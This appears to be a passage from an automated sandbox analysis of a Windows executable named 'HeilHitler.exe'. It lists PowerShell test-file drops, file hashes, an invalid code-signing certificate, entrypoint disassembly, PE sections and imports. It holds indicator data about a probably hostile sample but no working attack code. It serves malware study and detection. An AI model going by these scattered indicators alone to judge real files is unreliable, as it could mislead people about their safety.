                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzztcnwr.pmz.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsj1aaw1.5df.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kg2elmyz.15x.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lercbjli.eae.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1xf24sv.z5s.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjfsbdwt.cgx.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjrbcsdi.ykh.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0xcisin.4td.ps1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwpafoiy.ys3.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlijf2mm.0j4.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uqjigzwp.ahr.psm1

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                          \Device\ConDrv

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):97
                                                                                                                                                                                                                                          Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                          MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                          SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                          SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                          SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.989688354126539
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:HeilHitler.exe
                                                                                                                                                                                                                                          File size:6'251'402 bytes
                                                                                                                                                                                                                                          MD5:aeab677edfb0b7838ad440c071a04965
                                                                                                                                                                                                                                          SHA1:9855bbfe1e4d729853c1d3fd5e51a6d767cf8203
                                                                                                                                                                                                                                          SHA256:e465cccde051595262dc76359e4a06279341b4292901a49061cf9fa1386119df
                                                                                                                                                                                                                                          SHA512:567dd7cd29f4c35e0d99470628535fddb6f801ce36708003d9a6cc95a0933b613e221c07347040746e4ee174322c02b8da4c59828b79a963ff69c9378a735849
                                                                                                                                                                                                                                          SSDEEP:98304:0bEtdFBg0amaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4R0BMnM3JfFTW:0SFceN/FJMIDJf0gsAGK4R0un+TW
                                                                                                                                                                                                                                          TLSH:5F5633B023A448E2EDBB493EC857C89AD5B0B8050754DECF1370826A1F637594E7FB96
                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Zpc.Zpc.Zpc...`.]pc...f..pc...g.Ppc.....Ypc...`.Spc...g.Kpc...f.rpc...b.Qpc.Zpb..pc.O.g.Cpc.O.a.[pc.RichZpc.........PE..d..

                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                          Time Stamp:0x6726B539 [Sat Nov 2 23:26:49 2024 UTC]
                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                          Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                                          • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                                          • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                                          Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                          Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                          Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                          Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                          call 00007F2704E43A0Ch
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                          jmp 00007F2704E4362Fh
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                          call 00007F2704E43DD8h
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F2704E437D3h
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                          jmp 00007F2704E437B7h
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          cmp ecx, eax
                                                                                                                                                                                                                                          je 00007F2704E437C6h
                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                                          jne 00007F2704E437A0h
                                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                                          jmp 00007F2704E437A9h
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          sub esp, 28h
                                                                                                                                                                                                                                          test ecx, ecx
                                                                                                                                                                                                                                          jne 00007F2704E437B9h
                                                                                                                                                                                                                                          mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                                          call 00007F2704E42F05h
                                                                                                                                                                                                                                          call 00007F2704E441F0h
                                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                                          jne 00007F2704E437B6h
                                                                                                                                                                                                                                          xor al, al
                                                                                                                                                                                                                                          jmp 00007F2704E437C6h
                                                                                                                                                                                                                                          call 00007F2704E50D0Fh
                                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                                          jne 00007F2704E437BBh
                                                                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                                                                          call 00007F2704E44200h
                                                                                                                                                                                                                                          jmp 00007F2704E4379Ch
                                                                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          add esp, 28h
                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                          inc eax
                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          sub esp, 20h
                                                                                                                                                                                                                                          cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                                          mov ebx, ecx
                                                                                                                                                                                                                                          jne 00007F2704E43819h
                                                                                                                                                                                                                                          cmp ecx, 01h
                                                                                                                                                                                                                                          jnbe 00007F2704E4381Ch
                                                                                                                                                                                                                                          call 00007F2704E43D4Eh
                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                          je 00007F2704E437DAh
                                                                                                                                                                                                                                          test ebx, ebx
                                                                                                                                                                                                                                          jne 00007F2704E437D6h
                                                                                                                                                                                                                                          dec eax
                                                                                                                                                                                                                                          lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                                          call 00007F2704E50B02h

                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x944.rsrc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x5f3f420x2448
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000x764.reloc
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                          .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rdata0x2b0000x12a500x12c009401ac65aa27d3b825eaa9a5193c2635False0.5245182291666667data5.752829645270396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                          .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .rsrc0x470000x9440xa00e8658713401cf79474dadd6bd294884fFalse0.43046875data5.116289783193498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                          .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                          RT_VERSION0x470a00x394OpenPGP Secret Key0.4650655021834061
                                                                                                                                                                                                                                          RT_MANIFEST0x474340x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                          USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                          COMCTL32.dll
